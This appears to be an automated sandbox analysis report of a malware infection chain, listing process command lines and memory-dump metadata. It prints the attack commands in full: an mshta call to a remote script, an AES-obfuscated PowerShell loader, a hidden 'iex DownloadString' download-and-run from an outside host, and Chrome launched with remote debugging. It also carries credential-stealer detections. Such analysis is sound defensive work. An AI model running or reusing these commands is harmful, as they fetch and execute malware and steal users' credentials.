                                                                                                                                                                                                                                                      Commandline:cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4"
                                                                                                                                                                                                                                                      Imagebase:0x6e0000
                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:15:04:38
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff685670000
                                                                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                      Start time:15:04:38
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4
                                                                                                                                                                                                                                                      Imagebase:0xe0000
                                                                                                                                                                                                                                                      File size:13'312 bytes
                                                                                                                                                                                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:15:04:41
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129)
                                                                                                                                                                                                                                                      Imagebase:0xe40000
                                                                                                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:15:04:41
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff685670000
                                                                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:15:04:45
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                                                                                                                                                                                                                                                      Imagebase:0xe40000
                                                                                                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.57200410289.0000000008220000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:15:04:45
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff685670000
                                                                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                      Start time:15:06:19
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff78d9e0000
                                                                                                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:15:06:23
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                      Imagebase:0x7ff66d350000
                                                                                                                                                                                                                                                      File size:2'742'376 bytes
                                                                                                                                                                                                                                                      MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:15:06:25
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
                                                                                                                                                                                                                                                      Imagebase:0x7ff66d350000
                                                                                                                                                                                                                                                      File size:2'742'376 bytes
                                                                                                                                                                                                                                                      MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Reset < >
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000003.56230761294.00000000070B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_3_70b0000_mshta.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction ID: ced7ffe9383f03fcb86f3180841d10ec44046b742b8f09f196aa8db288f3d947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3afd37c51510c6199023390d952c7f8051d3cdcdc9aff298ad586ecdbf2ba59
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6015d2967ad086741a330e5e117dddb9b96a2c995dca9830f60a64cc5ba7316d
                                                                                                                                                                                                                                                        • Instruction ID: 3da5ffbdab8296b1d44ffac6b9d272819705dc50b8758523643108b5e067f17c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6015d2967ad086741a330e5e117dddb9b96a2c995dca9830f60a64cc5ba7316d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9B14F70E00609CFDF14CFA9D885BAEBBF6BF88744F148529D815A7294EB749846CF81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9e9381c3e9648ff0cc5f904499d325ced60bb3cbcd24c5dd7997de37f3b0048c
                                                                                                                                                                                                                                                        • Instruction ID: 1d6a646b0e49c420607bf5e418b31b51d27f6cb4155c00e8411cb860aae1e32e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9381c3e9648ff0cc5f904499d325ced60bb3cbcd24c5dd7997de37f3b0048c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EB16E70E002098FDF14CFA9D881BAEBBF6BF88354F14852AD815E7294EB749845CF91
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$4\,j$4\,j$@b,j$@b,j$@b,j$@b,j
                                                                                                                                                                                                                                                        • API String ID: 0-4194018717
                                                                                                                                                                                                                                                        • Opcode ID: 7233c3a514a08a9321444956dcb0dca2144fa4909eed9dc518e21061f1e836e1
                                                                                                                                                                                                                                                        • Instruction ID: 7562ae89fd38f28f57df29231bd9fa9846a23f4737de1540101983b7c4c3be5a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7233c3a514a08a9321444956dcb0dca2144fa4909eed9dc518e21061f1e836e1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4342B070B40209EFDB58DBA4C454B6EBBF2BB89304F248269D406AF355CF71DC419B96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: +j$ +j$4\,j$4\,j$4\,j$4\,j$@b,j$@b,j
                                                                                                                                                                                                                                                        • API String ID: 0-4145147032
                                                                                                                                                                                                                                                        • Opcode ID: 2150866dafe0f25ecadd9ef4ce86d044974bbfb4423e3ff88e599961e4e467f4
                                                                                                                                                                                                                                                        • Instruction ID: f2677e794390044c24f16ffaf742b4fd86b596eafec6bbc91586920c431e6078
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2150866dafe0f25ecadd9ef4ce86d044974bbfb4423e3ff88e599961e4e467f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE917BB4B4020EDFDB54CB54C554AA9BBF2AF89314F24C2A9D816AF354DB31EC42CB91
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-228363525
                                                                                                                                                                                                                                                        • Opcode ID: 7f05c86feb96cbafd3e81f5c6792a7b38069d185939844bb27c6b1279c14aa80
                                                                                                                                                                                                                                                        • Instruction ID: 9bde3c5d71f5cf69b33068b150e68d2529becc3f5bdc2c0a72936168d6de8b99
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f05c86feb96cbafd3e81f5c6792a7b38069d185939844bb27c6b1279c14aa80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4D13AB5B0430B9FDF959B65980066ABBF69FC6210F1482BAD542DF252DE31CC01D7A2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fbb1f8f93f71fc4105a8d3f4bc3f443c81b1c03861de735beaa57460855d91ef
                                                                                                                                                                                                                                                        • Instruction ID: 8c954fede66ebebdbe545c17804105f3dd3589f6ae34f797da5f7391aea4663b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbb1f8f93f71fc4105a8d3f4bc3f443c81b1c03861de735beaa57460855d91ef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4E11574A00259DFDB15CFA8D484A9DBBB2FF89310F24C199E845AB361C735ED81CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 641b18bd17589c13265b785bc2fed09acacbaaaf7fe83191dcbf8dd2067f6976
                                                                                                                                                                                                                                                        • Instruction ID: 2a67af0bd6472e77c7d234f27628e67c270aad02f093ea2c5505deaf84676cd1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 641b18bd17589c13265b785bc2fed09acacbaaaf7fe83191dcbf8dd2067f6976
